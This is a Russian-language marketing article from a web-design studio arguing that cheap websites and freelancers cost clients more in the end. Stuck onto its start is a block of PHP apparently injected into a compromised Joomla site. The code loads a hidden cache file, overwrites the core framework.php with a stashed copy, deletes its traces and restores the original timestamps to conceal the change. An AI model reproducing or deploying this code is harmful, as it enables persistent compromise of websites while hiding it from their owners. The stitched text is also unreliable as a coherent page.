$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Полезная информация для желающих сделать сайт
Чем опасны дешевые сайты
В интернете можно встретить огромное количество предложений о создании сайта за сущие копейки.
Сайт за 10 тысяч!
Сайт за 5 тысяч!
Закажите у нас продвижение, получите сайт в подарок!

Казалось бы — все  отлично. Конкуренция на рынке предложений делает свое дело, цены падают.
Не торопитесь радоваться.
Никто не говорит, что нужно делать сайт за миллион. Но и когда вам предлагают сайт за три копейки, то стоит насторожиться.
Вы же не будете покупать бутылку алкоголя, которая стоит подозрительно дешево?
Это не значит, что вы будете искать водку с растворенным в ней золотом.
Это лишь значит, что вы просто не хотите отравиться.

Так же и с сайтами.

Если вы хотите получить настоящий качественный сайт, современный, стильный, оптимизированный под работу с поисковыми системами и, как следствие (и что самое важное) ЭФФЕКТИВНЫЙ, не ждите, что такой сайт вам достанется бесплатно.

Помните правило золотого выбора. «Быстро, качественно, дешево — выберите любые два критерия». Два выбранных критерия исключают третий.

Не будьте наивным.
Объявленная цена за сайт — далеко не всегда включает в себя полную стоимость работ. И речь не только о денежном исчислении. Непомерное затягивание сроков исполнения работ — обычное и банальное явление не только в строительстве домов и ремонте, но в деле создания сайтов.
А если говорить о денежном исчислении, то есть масса способов получить нужную сумму с клиента.
Любой создатель сайтов знает, что рано или поздно вы захотите что-то поменять на сайте. Схема — сайт за 5000 рублей, каждое изменение на нем — 500 рублей весьма распространена.
Ой, говорит заказчик. Я совсем забыл. Мне нужна гостевая книга! Ой, мне нужно прайс-лист поправить. Ой, мне говорили, что можно письмо прямо с сайта отправлять! Ой, ой, ой..
И это только на первый взгляд все не дорого. В итоге вы все равно заплатите  по полной программе, и никакой экономии не получите. Получите только головную боль и потерю времени.

Зачастую приходится встречаться с клиентами, которых поначалу «отпугнули» цены, которые мы оговорили за создание качественного сайта. Рынок сайтостроения, на самом деле, весьма узкий, и вероятность того, клиент вернется к нам, достаточно высока, как показывает практика. И возвращаются, как правило, сильно разочаровавшись в тех, кто предложил цену немного ниже, чем назвали мы.

Обычно происходит так. Клиент приходит к нам, говорит, что он хочет, мы называем адекватную цену, он говорит, что это дорого, и он знает (он же читал объявления в интернете) что это все можно сделать в три раза дешевле.
Можно, отвечаем мы. Любой студент с радостью возьмется за такую работу. Студентам всегда нужны деньги.
Однако, взяться — не значит сделать.
Во-первых, у студента еще не так много опыта. Сделать сайт — не значит, что сделать такой сайт, который вам был нужен.
Во-вторых, у студента есть гораздо более серьезные дела (сессия, поход с друзьями в клуб, встреча со знакомой девочкой). И жертвовать такими делами ради какого-то сайта он вряд ли станет.
Не забывайте — все они не выбрали создание сайтов своей профессией. Для них это просто подработка в свободное время. Если оно есть, то время. И требовать с таких людей обязательности в исполнении поставленной задачи не совсем уместно. Они не профессионалы. Потому и услуги у них стоят так дешево.
Вы же хотели сайт подешевле? Тогда еще раз вспомните золотое правило трех критериев. И ничему не удивляйтесь. Особенно, когда увидите результат.

Обычное дело, когда нанятый через интернет «фрилансер» просто пропадает без объявления причин. А у заказчика есть... А что у него есть? Номер аськи фрилансера? Адрес его почты? Согласитесь, с таким набором не так просто воздействовать на исполнителя. И договор с фрилансером, разумеется, никакой не заключали. Ведь хотели же сэкономить?

Через некоторое время клиент возвращается и просит переделать ему то, что сделали ему другие люди.
Или рассказывает трогательную историю, что люди, с которыми он договорился на «в три раза дешевле», взяли аванс и не сделали ничего. Или, как вариант,  сделали что-то такое, что и показать людям стыдно.
И вместо того, чтобы сразу получить в свои руки эффективный инструмент ведения бизнеса и привлечения потенциальных потребителей их товаров или услуг, они вынуждены тратить свое время на осознание того, что убогий сайт, который им тяп-ляп слатали за три копейки никто переделывать не будет, а предложат все сделать с чистого листа.
И придется снова платить — сайт-то, как ни крути, нужен.

Сайт не должен стоить ни дорого, ни дешево.
Он должен стоить адекватную цену. За которую можно требовать с исполнителя, и за которую исполнителю будет интересно все эти требования выполнять.
Настоящий современный сайт — это не просто страничка с телефоном и адресом вашего офиса.
Это возможность грамотно и обстоятельно рассказать о своих товарах и услугах, показать их, дать представление о том, чем и как вы занимаетесь в своей области, описать свои преимущества.
Наличие современных web-технологий позволяет значительно экономить на времени своих сотрудников, на рекламе, торговой аналитике и прочих вещах. 
Помните — дешевый сайт — путь к его переделыванию, а, значит, к обязательной потери очередной суммы денег, которую можно было бы потратить с большим умом и пользой.
Не забывайте — скупой платит дважды, лох платит всегда.
Так не проще ли получить грамотную консультацию специалистов, которые сами найдут наиболее оптимальную форму для Вашего сайта?
Которые помогут вам сделать не просто страничку в интернете, а полноценный бизнес-механизм, который позволит вам вести бизнес с большей эффективностью?
Специалисты нашей студии помогут вам сэкономить и время и деньги.
В любом случае, нам стоит позвонить. Просто попробуйте с нами проконсультироваться, и вы сами все поймете. Тем более что за спрос денег не берут.
 
JoomlaWatch Stats 1.2.9 by Matej Koval